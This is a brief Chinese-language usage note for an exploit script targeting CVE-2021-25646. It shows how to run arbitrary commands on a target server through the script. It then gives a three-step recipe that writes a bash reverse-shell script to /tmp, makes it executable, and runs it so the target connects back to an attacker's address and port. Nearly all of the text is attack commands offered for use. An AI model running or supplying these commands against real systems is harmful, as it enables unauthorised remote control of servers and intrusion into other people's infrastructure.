usage: python3 CVE-2021-25646.py -u http://x.x.x.x -c cmd

反弹shell如下：

写入反弹shell脚本

python3 CVE-2021-25646.py -u http://x.x.x.x -c "echo 'bash -i >& /dev/tcp/x.x.x.x/xxxx 0>&1' > /tmp/1.sh"

赋予shell脚本执行权限

python3 CVE-2021-25646.py -u http://x.x.x.x -c "chmod +x /tmp/1.sh"

执行shell

python3 CVE-2021-25646.py -u http://x.x.x.x -c "/bin/bash /tmp/1.sh"